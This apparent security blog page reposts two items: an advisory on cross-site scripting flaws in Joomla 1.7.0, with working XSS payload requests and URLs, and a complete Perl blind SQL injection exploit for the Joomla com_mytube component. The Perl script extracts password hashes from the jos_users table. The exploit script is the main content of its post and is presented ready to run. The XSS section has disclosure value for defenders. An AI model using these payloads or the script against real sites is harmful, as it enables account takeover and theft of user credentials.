Oct 03

Joomla 1.7.0 is vulnerable to multiple Cross Site Scripting issues

By jason Application Security No Comments »

1. OVERVIEW

Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
Scripting issues.

2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model鈥搗iew鈥揷ontroller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.

3. VULNERABILITY DESCRIPTION

Several parameters (searchword, extension, asset, author ) in Joomla!
Core components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim’s browser.

4. VERSION AFFECTED

1.7.0 <=

5. PROOF-OF-CONCEPT/EXPLOIT

component: com_search, parameter: searchword (Browser: IE, Konqueror)
==========================================================

[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456

task=search&Itemid=435&searchword=Search’;onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,
111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111
,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));
alert(String.fromCharCod(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};
//xsssssssssss&option=com_search
[/REQUEST]

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

User Login is required to execute the following XSSes.

Parameter: extension, Component: com_categories
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22

Parameter: asset , Component: com_media
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=

Parameter: author, Component: com_media
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=
&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.

7. SOLUTION

Upgrade to Joomla! 1.7.1-stable or higher.

8. VENDOR

Joomla! Developer Team
http://www.joomla.org

9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.

10. DISCLOSURE TIME-LINE

2011-07-29: notified vendor
2011-09-26: patched version, 1.7.1-stable, released
2011-09-29: vulnerability disclosed

11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.7.0-stable%5D_cross_site_scripting%28XSS%29
Vendor Advisory URLs:
http://developer.joomla.org/security/news/367-20110901-core-xss-vulnerability
http://developer.joomla.org/security/news/368-20110902-core-xss-vulnerability

Tagged with:
Oct 15

Joomla com_mytube (user_id) Blind SQL Injection Exploit

By jason Security Tools 1 Comment »

#!/usr/bin/perl -w

#———————————————————————————
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
#———————————————————————————

#Author         : Chip D3 Bi0s
#Group          : LatiHackTeam
#Email          : chipdebios[alt+64]gmail.com
#Date           : 15 September 2009
#Critical Lvl   : Moderate
#Impact            : Exposure of sensitive information
#Where            : From Remote
#—————————————————————————

#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#Application   : MyRemote Video Gallery
#version       : 1.0 Beta
#Developer     : Jomtube Team
#License       : GPL            type  : Non-Commercial
#Date Added    : Aug 24, 2009
#Download      : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
#Description   :

#MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x
#which will allow you to transform your Website into a professional looking Video
#Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery
#is an open source (GNU GPL) video sharing Joomla extension has been created
#specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.

#MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers
#the Framework so you can create your own Remote Plugins for other Remote Servers like
#Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to
#run your site for low cost since all the bandwidth usage and hard drive space is located
#on the video server sites. So if you already have a large library of Videos on some
#Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.

#—————————————————————————

#I.Blind SQL injection (user_id)
#Poc/Exploit:
#~~~~~~~~~~~
#http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null
#X: Valid User_id

#+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
#+++++++++++++++++++++++++++++++++++++++

use LWP::UserAgent;
use Benchmark;
my $t1 = new Benchmark;

system (‘cls’);
print "\n\n";
print "\t\t[+] ———————————[+]\n";
print "\t\t|          |  Chip d3 Bi0s |          |\n";
print "\t\t|        MyRemote Video Gallery Bsql  | \n";
print "\t\t|joomla component com_mytube (user_id)| \n";
print "\t\t[+]———————————-[+]\n\n";

print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=<STDIN>);

$w="Total Videos In Category";
$column_name="concat(password)";
$table_name="jos_users";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent(‘Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’);

print "—————-Inyectando—————-\n";

  $host = $target . "+and+1=1&option=com_mytube&Itemid=null";
  my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;
  if ($content =~ /$regexp/) {

$host = $target . "+and+1=2&option=com_mytube&Itemid=null";
  my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;
  if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}

else

{print " [-] Vulnerable :)\n";

$d=0;

for ($idusuario=62;$idusuario<=80;$idusuario++)

{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}

}

print " [+] Usuario existentes : "." ".join(‘,’, @idusu) . "\n";

print  " [-] # Usuario que desea extraer : ";chomp($iduss=<STDIN>);

for ($x=1;$x<=32;$x++)
    {

  $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
  my $res = $b->request(HTTP::Request->new(GET=>$host));  my $content = $res->content;  my $regexp = $w;
  print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}
  if ($content =~ /$regexp/)
  {
          for ($c=97;$c<=102;$c++)

{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;

if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
}

  }
else
{

for ($c=48;$c<=57;$c++)

{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;

if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
}

}

    }

print " [+] Password   :"." ".join(”, @caracter) . "\n";

my $t2 = new Benchmark;
my $tt = timediff($t2, $t1);
print "El script tomo:",timestr($tt),"\n";

}
}

else

{print " [-] Exploit Fallo :(\n";}

Tagged with:
preload preload preload